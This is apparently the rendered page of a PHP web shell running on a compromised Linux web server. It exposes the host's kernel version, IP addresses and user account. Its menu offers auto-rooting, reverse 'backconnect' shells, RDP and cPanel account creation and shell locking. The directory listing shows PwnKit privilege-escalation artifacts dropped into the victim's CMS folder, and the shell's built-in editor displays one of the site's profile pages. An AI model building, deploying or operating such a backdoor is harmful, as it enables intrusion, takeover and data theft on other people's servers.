Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.143.4.178
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
CMS-NEW /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
validations
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.5
KB
-rw-r--r--
add-keyword.php
5.24
KB
-rw-r--r--
assign-service.php
6.59
KB
-rw-r--r--
blank-page.php
486
B
-rw-r--r--
category-excel.php
2.02
KB
-rw-r--r--
category.php
5.59
KB
-rw-r--r--
change-password.php
1.87
KB
-rw-r--r--
dashboard.php
22.39
KB
-rw-r--r--
edit-profile.php
4.68
KB
-rw-r--r--
error_log
5.84
KB
-rw-r--r--
forgot-password.php
2.08
KB
-rw-r--r--
keywords.php
6.24
KB
-rw-r--r--
login.php
4.83
KB
-rw-r--r--
logout.php
194
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register.php
5.98
KB
-rw-r--r--
user-excel.php
2.11
KB
-rw-r--r--
user.php
3.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit-profile.php
<?php include("include/header.php"); ?> <div class="page-wrapper"> <?php include("include/top-nav.php"); ?> <div class="page-content"> <nav class="page-breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="#"> Edit</a></li> <li class="breadcrumb-item active" aria-current="page">Profile</li> </ol> </nav> <div class="row"> <div class="col-md-6 offset-md-3 grid-margin stretch-card"> <div class="card"> <div class="card-body"> <h6 class="card-title">Edit Your Profile</h6> <form class="forms-sample" id="fupForm" enctype="multipart/form-data"> <div class="form-group"> <label for="exampleInputUsername1">Username</label> <input type="text" class="form-control validate[required]" id="exampleInputUsername1" autocomplete="off" placeholder="Username" value="<?php echo $usr['name']; ?>" name="usr_name" > </div> <div class="form-group"> <label for="exampleInputEmail1">Email address</label> <input type="email" class="form-control" id="exampleInputEmail1" placeholder="Email" readonly="" value="<?php echo $usr['email']; ?>"> </div> <div class="form-group"> <label for="exampleInputUsername1">Company Name</label> <input type="text" class="form-control" id="exampleInputUsername1" autocomplete="off" placeholder="Username" value="<?php echo $usr['company_name']; ?>" name="company_name" > </div> <div class="form-group"> <label for="exampleInputPassword1">Profile Image (File Type-JPG, PNG)</label> <input class="form-control" type="file" accept="image/jpeg,image/png,image/jpg" id="file" name="files"> </div> <input type="hidden" name="caseno" value="<?php echo base64_encode('3'); ?>"> <input type="hidden" name="user_id" value="<?php echo $usr['id']; ?>"> <div id="msg" class="col-md-12"></div> <input type="submit" name="submit" class="btn btn-primary mr-2" value="Update"/> <button class="btn btn-light"><a href="dashboard.php">Cancel<a></button> </form> </div> </div> </div> </div> </div> <?php include("include/footer.php"); ?> <script> $(document).ready(function(){ // Submit form data via Ajax $("#fupForm").on('submit', function(e){ e.preventDefault(); $.ajax({ type: 'POST', url: 'php/', data: new FormData(this), dataType: 'json', contentType: false, cache: false, processData:false, beforeSend: function(){ $('.submitBtn').attr("disabled","disabled"); $(".submitBtn").html('Sending...').attr('disabled','disabled'); }, success: function(json){ if(json.code=='1') { $(':input', "#fupForm").not(':button, :submit, :reset, :hidden, :radio').val('').removeAttr('checked').removeAttr('selected'); $("#msg").html("<div class='alert-success'><center><h4>Success!</h4>"+json.msg+"<center></div> "); $("#msg").slideDown(400).delay(5000).slideUp(400); setTimeout(function(){ window.location.href="edit-profile.php"; },2000); } else { $("#msg").html("<div class='alert-error'><center><h4>Warning!</h4>"+json.msg+"<center></div> "); $("#msg").slideDown(400).delay(5000).slideUp(400); form.find(":submit").html('Submit').removeAttr('disabled'); } } }); }); // File type validation var match = ['image/jpeg', 'image/png', 'image/jpg']; $("#file").change(function() { for(i=0;i<this.files.length;i++){ var file = this.files[i]; var fileType = file.type; if(this.files.length>2) { alert('Please upload maximum 2 files.'); $("#file").val(''); return false; } else { if(!((fileType == match[0]) || (fileType == match[1]) || (fileType == match[2]) || (fileType == match[3]) || (fileType == match[4]) || (fileType == match[5]))){ alert('Sorry, only PDF, DOC, JPG, JPEG, & PNG files are allowed to upload.'); $("#file").val(''); return false; } } } }); }); </script>
Close